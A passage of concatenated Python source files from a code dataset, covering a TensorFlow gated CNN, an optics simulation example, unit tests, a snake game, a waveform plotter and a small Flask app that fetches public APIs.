GatedCNN_nopadding(object):\n \"\"\"\n Uses an embedding layer, followed by a convolutional,gated, and softmax layer.\n \"\"\"\n def __init__(\n self, sequence_length, num_classes, vocab_size,\n embedding_size, filter_sizes, num_filters, l2_reg_lambda,learning_rate):\n\n # Placeholders for input, output and dropout\n self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\")\n\n # Keeping track of l2 regularization loss (optional)\n l2_loss = tf.constant(0.0)\n\n\n\n # Embedding layer\n with tf.device('/cpu:0'), tf.name_scope(\"embedding\"):\n self.W = tf.Variable(\n tf.random_uniform([vocab_size, embedding_size], -0.25, 0.25),trainable=True,\n name=\"W\")\n self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n\n\n self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)\n\n # Create a convolution + maxpool layer for each filter size\n\n filter_size = filter_sizes[0]\n with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\n # Convolution Layer\n filter_shape = [filter_size, embedding_size, 1, num_filters]\n W1 = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W1\")\n b1 = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b1\")\n conv = tf.nn.conv2d(\n self.embedded_chars_expanded,\n W1,\n strides=[1, 1, 1, 1],\n padding=\"VALID\",\n name=\"conv\")\n\n h1 = tf.add(conv, b1)\n\n W2 = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W2\")\n b2 = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b2\")\n conv = tf.nn.conv2d(\n self.embedded_chars_expanded,\n W2,\n strides=[1, 1, 1, 1],\n padding=\"VALID\",\n name=\"conv\")\n h2 = tf.add(conv, b2)\n\n #add forget gate\n h = h1 * tf.sigmoid(h2)\n print (h.shape)\n h = tf.reshape(h, (-1, (num_filters * (sequence_length - filter_size + 1))))\n print (h.shape)\n\n\n\n # Add dropout\n with tf.name_scope(\"dropout\"):\n self.h_drop = tf.nn.dropout(h, self.dropout_keep_prob)\n\n # Final (unnormalized) scores and predictions\n with tf.name_scope(\"output\"):\n W = tf.get_variable(\n \"W\",\n shape=[h.get_shape()[1], num_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name=\"b\")\n l2_loss += tf.nn.l2_loss(W)\n l2_loss += tf.nn.l2_loss(b)\n self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name=\"scores\")\n self.predictions = tf.argmax(self.scores, 1, name=\"predictions\")\n\n # CalculateMean cross-entropy loss\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.scores, labels=self.input_y)\n self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss\n # optimizer = tf.train.AdamOptimizer(learning_rate)\n # grads_and_vars = optimizer.compute_gradients(self.loss)\n # self.train_op = optimizer.apply_gradients(grads_and_vars)\n\n\n # Accuracy\n with tf.name_scope(\"accuracy\"):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, \"float\"), name=\"accuracy\")\n self.y = tf.argmax(self.input_y, 1)\n\n\n\n","sub_path":"gated_cnn_nopadding.py","file_name":"gated_cnn_nopadding.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294651348","text":"\"\"\"\nTest script for testing the AiryBeam1D command.\n\"\"\"\n\nfrom LightPipes import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwavelength = 2.3*um\nsize = 30*mm\nN = 500\nN2=N//2\nx0=0.3*mm\na=0.1/mm\ndz=1.25*cm\nNZ=200\nw=0.5*mm\n\nF0=Begin(size,wavelength,N)\nF0=AiryBeam1D(F0,x0=x0, a=a)\nIx=np.zeros(N)\nfor k in range(0,NZ):\n if k==10:\n F0=CircScreen(F0,w,x_shift=-1*mm)\n F=Forvard(F0,dz*k)\n I=Intensity(F)\n Ix=np.vstack([Ix,I[N2]])\n\nplt.figure(figsize = (12,5))\nplt.imshow(Ix,\n extent=[-size/2/mm, size/2/mm, 0, NZ*dz/cm],\n aspect=0.08,\n origin='lower',\n cmap='jet',\n )\nplt.title('1D Airy beam')\nplt.xlabel('x [mm]')\nplt.ylabel('z [cm]')\ns = r'LightPipes for Python' + '\\n'+ '1D Airy beam' + '\\n\\n'\\\n r'$\\lambda = {:4.2f}$'.format(wavelength/um) + r' ${\\mu}m$' + '\\n'\\\n r'$size = {:4.2f}$'.format(size/mm) + r' $mm$' + '\\n'\\\n r'$N = {:4d}$'.format(N) + '\\n'\\\n r'$x_0 = {:4.2f}$'.format(x0/mm) + r' $mm$' + '\\n'\\\n r'$a = $' + '{:4.2f}'.format(a*mm) + r' $/mm$' + '\\n'\\\n r'${\\copyright}$ Fred van Goor, May 2022'\nplt.text(16, 50, s, bbox={'facecolor': 'white', 'pad': 5})\nplt.show()\n","sub_path":"docs/plot_directive/Examples/Commands/AiryBeam1D.py","file_name":"AiryBeam1D.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90784738","text":"import re\n\nimport pytest\n\nfrom storyscript.resolver import Resolver\n\n\n@pytest.mark.parametrize('path,data,result', [\n (['a', 'b', 'c'], {'a': {'b': {'c': 1}}}, 1),\n (['a'], {'a': {'b': {}}}, {'b': {}}),\n (['a', '1', 'b'], {'a': [None, {'b': 1}]}, 1)\n])\ndef test_resolve_path(path, data, result):\n assert Resolver.path(path, data) == result\n\n\ndef test_resolve_path_undefined():\n assert Resolver.path('a.b', {}) is None\n\n\n@pytest.mark.parametrize('obj,data,result', [\n ({'$OBJECT': 'path', 'paths': ['a']}, {'a': 1}, 1),\n ({'$OBJECT': 'value', 'value': 'a'}, None, 'a'),\n ({'$OBJECT': 'value', 'value': 1}, None, 1),\n ({'$OBJECT': 'expression',\n 'expression': '{} == 1',\n 'values': [{'$OBJECT': 'path', 'paths': ['a']}]}, {'a': 1}, True),\n ({'$OBJECT': 'expression',\n 'expression': '{} > {}',\n 'values': [{'$OBJECT': 'path', 'paths': ['a']},\n {'$OBJECT': 'value', 'value': 2}]},\n {'a': 1}, False),\n ({'$OBJECT': 'method',\n 'method': 'is',\n 'left': {'$OBJECT': 'value', 'value': 1},\n 'right': {'$OBJECT': 'path', 'paths': ['a']}},\n {'a': 1}, 1),\n (1, None, 1),\n (None, None, None),\n ('string', None, 'string'),\n ({'a': 'b'}, None, {'a': 'b'})\n])\ndef test_resolve_resolve(obj, data, result):\n assert Resolver.resolve(obj, data) == result\n\n\ndef test_resolve_obj_regexp():\n result = Resolver.object({'$OBJECT': 'regexp', 'regexp': 'abc'}, None)\n assert result.pattern == 'abc'\n\n\n@pytest.mark.parametrize('method, left, right, result', [\n ('like', 'abc', re.compile('^abc'), True),\n ('has', {'b': 1}, 'b', True),\n ('contains', {'b': 1}, 'b', True),\n ('contains', {}, 'c', False),\n ('has', ['b'], 'b', True),\n ('in', 'b', ['b'], True),\n ('excludes', 1, [0], True),\n ('contains', ['b'], 'b', True),\n ('isnt', 1, 1, False),\n ('is', 1, 1, True),\n])\ndef test_resolve_method(method, left, right, result):\n assert Resolver.method(method, left, right) == result\n\n\n@pytest.mark.parametrize('items_list, data, result', [\n ([{'$OBJECT': 'path', 'paths': ['a']}], {'a': 1}, [1]),\n ([{'$OBJECT': 'path', 'paths': ['a']}], {}, [None]),\n ([], None, []),\n ([{'$OBJECT': 'path', 'paths': ['abc']},\n {'$OBJECT': 'value', 'value': 1}],\n {'abc': 0, 'b': 1}, [0, 1]),\n])\ndef test_resolve_list(items_list, data, result):\n assert Resolver.values(items_list, data=data) == result\n\n\n@pytest.mark.parametrize('dictionary, data, result', [\n ({'k': {'$OBJECT': 'path', 'paths': ['a']}}, {'a': 1}, {'k': 1}),\n ({'k': {'$OBJECT': 'path', 'paths': ['a']}}, {}, {'k': None}),\n ({}, None, {}),\n ({'a': {'$OBJECT': 'path', 'paths': ['abc']},\n 'b': {'$OBJECT': 'value', 'value': 1}},\n {'abc': 0, 'b': 1}, {'a': 0, 'b': 1}),\n])\ndef test_resolve_dict(dictionary, data, result):\n assert Resolver.dictionary(dictionary, data) == result\n\n\n@pytest.mark.parametrize('value,result', [\n (1, '1'),\n ('a', '\"\"\"a\"\"\"'),\n ('a\"', '\"\"\"a\\\"\"\"\"'),\n])\ndef test_stringify(value, result):\n assert Resolver.stringify(value) == result\n","sub_path":"tests/integration/test_resolver.py","file_name":"test_resolver.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"136832103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 3 23:03:59 2019\r\n\r\n@author: alessandrocravioglio\r\n\"\"\"\r\n\r\nclass Auto(object):\r\n def __init__(self, color):\r\n self._color = color\r\n \r\n def set_color(self, newcolor):\r\n self._color = newcolor\r\n \r\n def get_color(self):\r\n return \"The car is \"+self._color+\".\"\r\n \r\n def enter_auto(self, enter_auto):\r\n if self._door_status:\r\n if enter_auto == \"in\":\r\n self._enter_auto = True\r\n elif enter_auto == \"out\":\r\n self._enter_auto = False\r\n else:\r\n raise ValueError(\"You can only go in and co out of your car\")\r\n self._enter_auto = False\r\n else:\r\n return \"The doors are closed, you can't enter\"\r\n \r\n def get_driver_in(self): #TODO: integration with the rest of the methods\r\n if self._enter_auto == True:\r\n return \"You are ready to start, but first do all the occurrences.\"\r\n else:\r\n self._enter_auto == False\r\n return \"you are out of the car.\"\r\n \r\n def set_motor_status(self, motor_status):\r\n if self._enter_auto: \r\n if motor_status == \"turn on\":\r\n self._motor_status = True\r\n elif motor_status == \"turn off\":\r\n self._motor_status = False\r\n else:\r\n raise ValueError(\"You can only turn off or turn down the motor\")\r\n self._motor_status = False\r\n elif self._door_status:\r\n return \"The doors are open\"\r\n else:\r\n return \"You are out of the car\"\r\n \r\n def get_motor_status(self):\r\n if self._motor_status:\r\n return \"The motor is on.\"\r\n else:\r\n return \"The motor is off.\"\r\n \r\n def set_door_status(self, door_status):\r\n if door_status == \"open doors\":\r\n self._door_status = True\r\n elif door_status == \"close doors\":\r\n self._door_status = False\r\n else:\r\n raise ValueError(\"you can only close and open the doors\")\r\n \r\n def get_door_status(self):\r\n if self._door_status:\r\n return \"The doors are open\"\r\n else:\r\n return \"The doors are closed\"\r\n \r\n def set_speed(self, speed):\r\n self._speed = speed\r\n \r\n def get_speed(self):\r\n return self._speed\r\n \r\n def get_car_status(self):\r\n return Auto.get_door_status(self),Auto.get_driver_in(self) , Auto.get_motor_status(self), Auto.get_color(self) #Auto.get_speed(self)\r\n \r\n \r\n \r\n# IMPORTANT: spped is not well implemented\r\n# to make this Auto function you have to follow theese steps:\r\n# 1. open the doors ==> set_door_status(\"open doors\")\r\n# 2. enter in the auto ==> enter_auto(\"in\")\r\n# 3. turn on the motor == set_motor_status(\"turn on\") \r\n# if you want to see the car status, you have to call the method get_car_status()\r\n# PROBLEM: you have to assign the attributes, or the program will print an AttributeError\r\n\r\n\"\"\" \r\nto implement when the Auto is functioning well\r\n \r\nclass Position(object):\r\n pass\r\n\r\nclass My_position(Position):\r\n pass\r\n\r\nclass Final_position(Position):\r\n pass\r\n \r\n\"\"\" \r\n\r\n#think about the architecture,only one class or more classes?\r\n#implement position\r\n\r\nmy_car = Auto(\"grey\")\r\nmy_car.set_door_status(\"open doors\")\r\nmy_car.enter_auto(\"in\")\r\nmy_car.set_motor_status(\"turn on\")\r\n\r\nprint(my_car.get_car_status())\r\n\r\n","sub_path":"py-oop-auto.py","file_name":"py-oop-auto.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"280060746","text":"import pygame\nimport random\n\nFRAME_RATE = 10\nFRAME_WIDTH = 500\nFRAME_HEIGHT = 500\nWALL_WIDTH = 5\nSNAKE_SIZE = 20\nFOOD_RAD = 4\n\nclass Snake(object):\n def __init__(self):\n self.x = (FRAME_WIDTH - SNAKE_SIZE)/2 + WALL_WIDTH\n self.y = (FRAME_HEIGHT - SNAKE_SIZE)/2 + WALL_WIDTH\n self.length = 1\n self.x_vel = SNAKE_SIZE\n self.y_vel = 0\n\n self.body = [self.head()]\n\n def head(self):\n return pygame.Rect(self.x, self.y, SNAKE_SIZE, SNAKE_SIZE)\n\n def move_left(self):\n self.x_vel = - SNAKE_SIZE\n self.y_vel = 0\n\n def move_right(self):\n self.x_vel = SNAKE_SIZE\n self.y_vel = 0\n\n def move_up(self):\n self.x_vel = 0\n self.y_vel = -SNAKE_SIZE\n\n def move_down(self):\n self.x_vel = 0\n self.y_vel = SNAKE_SIZE\n\n def increase_size(self):\n self.body.insert(0, pygame.Rect(self.x, self.y, SNAKE_SIZE, SNAKE_SIZE))\n\n def draw(self, win):\n self.x = (self.x + self.x_vel)\n if self.x < WALL_WIDTH or self.x >= FRAME_WIDTH+WALL_WIDTH:\n return False\n self.y = (self.y + self.y_vel)\n if self.y < WALL_WIDTH or self.y >= FRAME_HEIGHT+WALL_WIDTH:\n return False\n for piece in self.body:\n if piece.colliderect(self.head()):\n return False\n self.body.insert(0, self.head())\n self.body.pop()\n drawn = []\n for piece in self.body:\n pygame.draw.rect(win, (0,255,0), piece)\n drawn.append(piece)\n\n return True\n\n def __del__(self):\n pass\n\nclass Food(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.show = False\n\n @classmethod\n def random(cls):\n return Food(random.randint(0, FRAME_WIDTH) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE//2 + WALL_WIDTH,\n random.randint(0, FRAME_HEIGHT) // SNAKE_SIZE * SNAKE_SIZE + SNAKE_SIZE//2 + WALL_WIDTH)\n\n def check_eat(self, snake):\n return snake.head().collidepoint(self.x, self.y)\n\n def draw(self, win):\n pygame.draw.circle(win, (255,0,0), (self.x, self.y), FOOD_RAD)\n\ndef display_text(win, text, x, y, size, color):\n font = pygame.font.SysFont('comicsansms', size)\n rendering = font.render(text, True, color)\n win.blit(rendering, (x, y))\n\ndef text_size(text, size):\n font = pygame.font.SysFont('comicsansms', size)\n return font.size(text)\n\ndef main():\n # start the window\n win = pygame.display.set_mode((FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2))\n\n #initial setup\n pygame.display.set_caption('Snakey Snake')\n clock = pygame.time.Clock()\n\n init = pygame.font.init()\n\n # init the snake\n snake = Snake()\n\n # init the current food item\n food = Food.random()\n\n # do the intro sequence\n pygame.draw.lines(win, (255,255,255), True, [(0,0),\n (0,FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, 0)], 5)\n pygame.draw.rect(win, (255,255,255), (FRAME_WIDTH//2 - 100 + WALL_WIDTH, FRAME_HEIGHT//2 - 50 + WALL_WIDTH,\n 200, 100))\n text_width, text_height = text_size('START', 40)\n display_text(win, 'START', (FRAME_WIDTH-text_width)//2 + WALL_WIDTH, (FRAME_HEIGHT-text_height)//2 + WALL_WIDTH, 40, (0,0,0))\n pygame.display.update()\n wait = True\n while wait:\n clock.tick(FRAME_RATE)\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n wait = False\n\n wait = True\n while wait:\n clock.tick(FRAME_RATE)\n if event.type == pygame.QUIT:\n wait = False\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n snake.move_left()\n elif event.key == pygame.K_RIGHT:\n snake.move_right()\n elif event.key == pygame.K_UP:\n snake.move_up()\n elif event.key == pygame.K_DOWN:\n snake.move_down()\n elif event.key == pygame.K_ESCAPE or event.key == pygame.K_RETURN:\n wait = False\n\n if food.check_eat(snake):\n snake.increase_size()\n del food\n food = Food.random()\n\n win.fill((0,0,0))\n pygame.draw.lines(win, (255,255,255), True, [(0,0),\n (0,FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, FRAME_HEIGHT+WALL_WIDTH*2),\n (FRAME_WIDTH+WALL_WIDTH*2, 0)], 5)\n food.draw(win)\n wait = snake.draw(win)\n pygame.display.update()\n\n # do clean up stuff here\n pygame.draw.rect(win, (255,0,0), (FRAME_WIDTH//2 - 100 + WALL_WIDTH, FRAME_HEIGHT//2 - 50 + WALL_WIDTH,\n 200, 100))\n text_width, text_height = text_size('DED', 40)\n display_text(win, 'DED', (FRAME_WIDTH-text_width)//2 + WALL_WIDTH, (FRAME_HEIGHT-text_height)//2 + WALL_WIDTH, 40, (0,0,0))\n pygame.display.update()\n\n wait = True\n while wait:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and (event.key == pygame.K_RETURN or event.key == pygame.K_ESCAPE):\n wait = False\n return\n\nif __name__ == '__main__':\n main()","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"45911919","text":"from biplist import *\nimport datetime\nimport os\nfrom test_utils import *\nimport unittest\n\nclass TestValidPlistFile(unittest.TestCase):\n def setUp(self):\n pass\n \n def validateSimpleBinaryRoot(self, root):\n self.assertTrue(type(root) == dict, \"Root should be dictionary.\")\n self.assertTrue(type(root[b'dateItem']) == datetime.datetime, \"date should be datetime\")\n self.assertEqual(root[b'dateItem'], datetime.datetime(2010, 8, 19, 22, 27, 30, 385449), \"dates not equal\" )\n self.assertEqual(root[b'numberItem'], -10000000000000000, \"number not of expected value\")\n self.assertEqual(root[b'unicodeItem'], 'abc\\u212cdef\\u2133')\n self.assertEqual(root[b'stringItem'], b'Hi there')\n self.assertEqual(root[b'realItem'], 0.47)\n self.assertEqual(root[b'boolItem'], True)\n self.assertEqual(root[b'arrayItem'], [b'item0'])\n \n def testFileRead(self):\n try:\n result = readPlist(data_path('simple_binary.plist'))\n self.validateSimpleBinaryRoot(result)\n except NotBinaryPlistException as e:\n self.fail(\"NotBinaryPlistException: %s\" % e)\n except InvalidPlistException as e:\n self.fail(\"InvalidPlistException: %s\" % e)\n \n def testUnicodeRoot(self):\n result = readPlist(data_path('unicode_root.plist'))\n self.assertEqual(result, \"Mirror's Edge\\u2122 for iPad\")\n \n def testEmptyUnicodeRoot(self):\n result = readPlist(data_path('unicode_empty.plist'))\n self.assertEqual(result, b\"\")\n \n def testSmallReal(self):\n result = readPlist(data_path('small_real.plist'))\n self.assertEqual(result, {b'4 byte real':0.5})\n \n def testKeyedArchiverPlist(self):\n \"\"\"\n Archive is created with class like this:\n @implementation Archived\n ...\n - (void)encodeWithCoder:(NSCoder *)coder {\n [coder encodeObject:@\"object value as string\" forKey:@\"somekey\"];\n }\n @end\n \n Archived *test = [[Archived alloc] init];\n NSData *data = [NSKeyedArchiver archivedDataWithRootObject:test]\n ...\n \"\"\"\n result = readPlist(data_path('nskeyedarchiver_example.plist'))\n self.assertEqual(result, {b'$version': 100000, \n b'$objects': \n [b'$null', \n {b'$class': Uid(3), b'somekey': Uid(2)}, \n b'object value as string', \n {b'$classes': [b'Archived', b'NSObject'], b'$classname': b'Archived'}\n ], \n b'$top': {b'root': Uid(1)}, b'$archiver': b'NSKeyedArchiver'})\n self.assertEqual(\"Uid(1)\", repr(Uid(1)))\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_valid.py","file_name":"test_valid.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"522471110","text":"import sys\nimport argparse\nimport itertools\n\nimport numpy as np\nimport tables as tb\n\nfrom matplotlib import pylab as plt\n\n_colors = itertools.cycle([\"k\", \"c\", \"r\", \"g\", \"y\", \"b\", \"dimgrey\", \"chocolate\", \"m\", \"gold\", \"tomato\", \"lime\"])\n\ndef mode(data):\n unique_values, occurrences = np.unique(data, return_counts=True)\n return unique_values[np.argmax(occurrences)]\n\n\ndef customize_plot(zoomx, zoomy, wf_type, evt, elecid=None):\n title = (\"{} | Evt {}\" .format(wf_type, evt ) if elecid is None else\n \"{} | Evt {}, elecid {}\".format(wf_type, evt, elecid))\n\n\n plt.xlabel(\"Time bin\")\n plt.ylabel(\"Amplitude (adc)\")\n plt.title(title)\n\n if zoomx: plt.xlim(zoomx)\n if zoomy: plt.ylim(zoomy)\n if elecid is None: plt.legend()\n\n\ndef show_and_wait():\n plt.show()\n input(\"Press [enter] to continue\")\n plt.clf()\n\n\ndef plot_waveforms(waveforms, sensors, evt, *, wf_type=\"PMT\", range=(None,),\n overlay=False, sum=False,\n zoomx=False, zoomy=False, dual=False):\n range = slice(*range)\n\n wfsize = waveforms.shape[2]\n time = np.arange(wfsize).astype(float)\n if wf_type == \"PMT\" : time /= 40\n elif wf_type == \"BLR\" : time /= 40\n elif wf_type == \"SiPM\": pass\n else: raise ValueError(\"Unrecognized wf type {}. \".format(wf_type) + \n \"Valid options: are 'PMT', 'BLR' and 'SiPM'\")\n\n if sum: wf_type += \" SUM\"\n\n gmin, gmax = float(\"inf\"), -float(\"inf\")\n plt.ion()\n ax1 = plt.gca()\n if sum:\n sum_wf = np.zeros(waveforms.shape[2])\n\n if dual:\n for wf, wf_dual, ID, color in zip(waveforms[0][range], waveforms[1][range] , sensors[range], _colors):\n ymin, ymax = min(wf_dual), max(wf_dual)\n if ymin < gmin: gmin = ymin\n if ymax > gmax: gmax = ymax\n\n plt.plot(wf, drawstyle=\"steps\", label=str(ID[0]), c=color)\n plt.plot(wf_dual, drawstyle=\"steps\", label=str(ID[0]), c=next(_colors))\n\n ylim = (0.99 * ymin, 1.01 * ymax)\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt, ID[0])\n show_and_wait()\n else:\n for wf, ID, color in zip(waveforms[0][range], sensors[range], _colors):\n ymin, ymax = min(wf), max(wf)\n if ymin < gmin: gmin = ymin\n if ymax > gmax: gmax = ymax\n\n if sum:\n bls_wf = wf - mode(wf)\n sum_wf = sum_wf + bls_wf * (1 if \"SiPM\" in wf_type else -1)\n else:\n plt.plot(wf, drawstyle=\"steps\", label=str(ID[0]), c=color)\n\n if not overlay and not sum:\n ylim = (0.99 * ymin, 1.01 * ymax)\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt, ID[0])\n show_and_wait()\n\n if overlay:\n ylim = 0.99 * gmin, 1.01 * gmax\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt)\n show_and_wait()\n\n if sum:\n ylim = np.min(sum_wf) - 50, np.max(sum_wf) + 50\n plt.plot(sum_wf, drawstyle=\"steps\", c=\"k\")\n customize_plot(zoomx, zoomy if zoomy else ylim, wf_type, evt)\n show_and_wait()\n\n\ndef plot_file(filename, rwf=True, blr=True, sipm=True, sipm_range=(None,),\n overlay=False, sum=False, first=0,\n zoomx=False, zoomy=False, dual=False, elecid=False):\n with tb.open_file(filename) as file:\n evt_step = 2 if dual else 1\n event_numbers = file.root.Run.events[:]\n if len(sipm_range) > 1:\n sipm_channels = file.root.Sensors.DataSiPM.cols.sensorID[:]\n if elecid:\n sipm_channels = file.root.Sensors.DataSiPM.cols.channel[:]\n start_idx = np.where(sipm_channels == sipm_range[0])[0][0]\n end_idx = np.where(sipm_channels == sipm_range[1])[0][0]\n sipm_range = (start_idx, end_idx)\n\n for evt in range(first, len(file.root.Run.events.cols.evt_number), evt_step):\n evt_number = event_numbers[evt][0]\n if rwf and \"RD/pmtrwf\" in file.root and \"Sensors/DataPMT\" in file.root:\n plot_waveforms(file.root.RD . pmtrwf [evt : evt+evt_step],\n file.root.Sensors.DataPMT [:],\n evt_number, wf_type=\"PMT\", overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n if blr and \"RD/pmtblr\" in file.root and \"Sensors/DataBLR\" in file.root:\n plot_waveforms(file.root.RD . pmtblr [evt : evt+evt_step],\n file.root.Sensors.DataBLR [:],\n evt_number, wf_type=\"BLR\", overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n if sipm and \"RD/sipmrwf\" in file.root and \"Sensors/DataSiPM\" in file.root:\n plot_waveforms(file.root.RD .sipmrwf [evt : evt + evt_step],\n file.root.Sensors.DataSiPM[:],\n evt_number, wf_type=\"SiPM\", range=sipm_range,\n overlay=overlay, sum=sum,\n zoomx=zoomx, zoomy=zoomy, dual=dual)\n\n\n#def _plot_waveform(waveforms, sensors):\n# nevts, nsensors, _ = waveforms.shape\n# for evt in range(nevts):\n## for evt in range(1):\n# for s in range(nsensors):\n## for s in range(640, 1000):\n## for s in range(128, 128 + 64):\n# data = waveforms[evt, s, :]\n# ymin = min(data)\n# ymax = max(data)\n# ymin = ymin - 0.1 * ymin\n# ymax = ymax + 0.1 * ymax\n#\n# title = \"Evt {}, elecid {}\".format(evt, sensors[s][0])\n#\n# plt.ion()\n# plt.plot(data, drawstyle='steps')\n# plt.ylim(ymin, ymax)\n# plt.title(title)\n# plt.show()\n# _ = input(\"Press [enter] to continue.\")\n# plt.clf()\n\nif __name__ == '__main__':\n def sipm_index(sensor_id):\n sensor_id = int(sensor_id)\n dice = sensor_id // 1000\n sipm_no = sensor_id % 1000\n return (dice - 1) * 64 + sipm_no\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--file\" , required=True)\n\n parser.add_argument( \"-pmt\" , action=\"store_true\")\n parser.add_argument( \"-blr\" , action=\"store_true\")\n parser.add_argument( \"-sipm\" , action=\"store_true\")\n #parser.add_argument(\"--sipm-range\", type=sipm_index, default=(None,), nargs=\"*\")\n parser.add_argument(\"--sipm-range\", type=int, default=(None,), nargs=\"*\")\n\n parser.add_argument(\"--overlay\" , action=\"store_true\")\n parser.add_argument(\"--sum\" , action=\"store_true\")\n parser.add_argument(\"--dual\" , action=\"store_true\")\n parser.add_argument(\"--first\" , type=int, default=0)\n parser.add_argument(\"--zoomx\" , type=int, default=(), nargs=\"*\")\n parser.add_argument(\"--zoomy\" , type=int, default=(), nargs=\"*\")\n parser.add_argument(\"--elecid\" , action=\"store_true\")\n\n args = parser.parse_args(sys.argv[1:])\n filename = args.file\n\n plot_file(filename,\n rwf=args.pmt, blr=args.blr, sipm=args.sipm, sipm_range=args.sipm_range,\n overlay=args.overlay, sum=args.sum, first=args.first,\n zoomx=args.zoomx, zoomy=args.zoomy, dual=args.dual, elecid=args.elecid)\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"382092288","text":"# Brian Lee \n# SoftDev1 pd6\n# K26 -- Getting More REST\n# 2018-11-15\n\nimport urllib\nimport json\nimport random\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\nPROXY = \"149.89.1.30:3128\"\n\n@app.route('/')\ndef root():\n \n # Testing the xkcd API\n URL = \"https://xkcd.com/info.0.json\"\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 1)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 'http')\n resp = urllib.request.urlopen(req, None, 3)\n\n xkcd_data = json.loads(resp.read())\n\n # Testing the Wikipedia API\n URL_STUB = \"https://en.wikipedia.org/w/api.php?\"\n PARAMS = {\n 'action': 'parse',\n 'page': 'Stuyvesant High School',\n 'section': 1,\n 'format': 'json',\n }\n URL = URL_STUB + urllib.parse.urlencode(PARAMS)\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 0.5)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 'http')\n resp = urllib.request.urlopen(req, None, 1)\n\n wiki_data = json.loads(resp.read())\n\n # Testing the Numbers API\n URL = \"http://numbersapi.com/random/math\"\n req = urllib.request.Request(URL)\n\n try:\n resp = urllib.request.urlopen(req, None, 0.5)\n except urllib.error.URLError:\n req.set_proxy(PROXY, 'http')\n resp = urllib.request.urlopen(req, None, 1)\n number_data = resp.read().decode()\n\n return render_template('main.html',\n xkcd=xkcd_data,\n number=number_data,\n wikipage=wiki_data['parse']['text']['*'],\n )\n\napp.debug=True\napp.run()\n","sub_path":"26_rrreeesssttt/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"547816190","text":"'''Invert For Printing inverts fluorescent images into \nbrightfield-looking images for printing.\n
\nThis module turns a single or multi-channel immunofluorescent-stained image\ninto an image that resembles a brightfield image stained with similarly\ncolored stains, which generally prints better.\n\nYou can operate on up to three grayscale images (representing\nthe red, green, and blue channels of a color image) or on an image that is\nalready a color image. The module can produce either three grayscale\nimages or one color image as output.\n\nIf you want to invert the grayscale intensities of an image, use ImageMath.\n'''\n\nimport numpy as np\n\nimport cellprofiler.cpimage as cpi\nimport cellprofiler.cpmodule as cpm\nimport cellprofiler.settings as cps\nfrom cellprofiler.settings import YES, NO\n\nCC_GRAYSCALE = \"Grayscale\"\nCC_COLOR = \"Color\"\nCC_ALL = [CC_COLOR, CC_GRAYSCALE]\nclass InvertForPrinting(cpm.CPModule):\n\n module_name = \"InvertForPrinting\"\n category = 'Image Processing'\n variable_revision_number = 1\n\n def create_settings(self):\n # Input 